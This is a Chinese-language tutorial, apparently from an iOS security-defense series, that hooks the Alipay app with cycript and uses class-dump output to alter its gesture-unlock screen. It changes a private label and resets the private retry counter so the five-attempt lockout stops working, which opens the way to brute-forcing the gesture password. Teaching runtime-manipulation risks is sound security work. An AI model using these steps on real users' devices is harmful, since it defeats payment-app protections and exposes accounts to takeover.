之前僅僅介紹了工具的使用,本文將實(shí)踐一下如何利用 cycript 結(jié)合 class-dump 結(jié)果 hack,還要犧牲一下支付寶 App 。
首先,老套路,取到手勢(shì)解鎖界面的 View Controller:
cy# var app = [UIApplication sharedApplication]
@"<DFApplication: 0x1666c960>"
cy# var keyWindow = app.keyWindow
@"<UIWindow: 0x16591bd0; frame = (0 0; 320 568); gestureRecognizers = <NSArray: 0x1b047000>; layer = <UIWindowLayer: 0x165d0650>>"
cy# var root = keyWindow.rootViewController
@"<UINavigationController: 0x179779a0>"
cy# var visible = root.visibleViewController
@"<GestureUnlockViewController: 0x165de090>"
然后,對(duì)照 class-dump-z 結(jié)果,來(lái)分析 GestureUnlockViewController 有什么利用價(jià)值 :
@interface GestureUnlockViewController : DTViewController <UIAlertViewDelegate, GestureHeadImageViewDelegate> {
@private
GestureHeadImageView* _headImageView;
GestureTipLabel* _tipLabel;
GestureInputView* _inputView;
DTButton* _forgetButton;
DTButton* _changeAccountButton;
int _retryCount;
UIView* _guideView;
id<GestrueViewControllerDelegate> _delegate;
}
@property(assign, nonatomic) __weak id<GestrueViewControllerDelegate> delegate;
-(void).cxx_destruct;
-(BOOL)shouldAutorotateToInterfaceOrientation:(int)interfaceOrientation;
-(void)headClicked;
-(void)gestureInputView:(id)view didFinishWithPassword:(id)password;
-(void)gestureInputViewFirstEffectiveTouch:(id)touch;
-(void)alertView:(id)view clickedButtonAtIndex:(int)index;
-(void)actionChangeAccountToLogin;
-(void)actionResetPswBtnClick;
-(void)resetCurrentUser;
-(void)resetPsw;
-(void)viewWillDisappear:(BOOL)view;
-(void)notifyFaceToFacePayReceivedData:(id)facePayReceivedData;
-(void)viewWillAppear:(BOOL)view;
-(void)breakFirstRun;
-(BOOL)isFirstRun;
-(void)guideViewClicked:(id)clicked;
-(void)viewDidLoad;
-(void)viewWillLayoutSubviews;
@end
目測(cè) _tipLabel
是寫(xiě)賬戶(hù)名和提示操作的 label ,上篇文章我提到過(guò):@private 限制不了 keyPath ,現(xiàn)在我們來(lái)修改一下支付寶登錄頁(yè)的用戶(hù)名信息:
cy# [visible setValue:@"Test By yiyaaixuexi" forKeyPath:@"_tipLabel.text"]
http://wiki.jikexueyuan.com/project/ios-security-defense/images/hack-practice.png" alt="hack-practice" />
支付寶手勢(shì)密碼解鎖有嘗試次數(shù)限制,連續(xù)錯(cuò) 5 次就要重新登錄。
我想解除重試解鎖次數(shù)的限制,發(fā)現(xiàn)了記錄解鎖次數(shù)的類(lèi)型是 int ,int _retryCount
,這一點(diǎn)讓我很不開(kāi)心,因?yàn)槲覠o(wú)法通過(guò) KVC 來(lái)修改其值了。
但是沒(méi)有關(guān)系,我可以通過(guò)指針訪(fǎng)問(wèn):
cy# visible->_retryCount = 0
0
這樣我就能無(wú)限制的用程序暴力破解手勢(shì)密碼了,來(lái)計(jì)算一下有多少種可能呢?
http://wiki.jikexueyuan.com/project/ios-security-defense/images/hack-practice2.png" alt="hack-practice2" />
這個(gè)數(shù)字對(duì)我來(lái)說(shuō)有點(diǎn)大,可是對(duì) iPhone5 的 CPU 來(lái)說(shuō)就是小菜一碟了~
等一下,密碼格式是什么呢?
-(void)gestureInputView:(id)view
didFinishWithPassword:(id)password;
id 類(lèi)型的密碼,很?chē)?yán)謹(jǐn),又給 hack 帶來(lái)不少麻煩呀~ 不過(guò)沒(méi)關(guān)系,我們可以利用 Method Swizzling 來(lái)打出 password 到底是什么,不過(guò)呢,貌似可以再寫(xiě)一篇新文章去介紹了……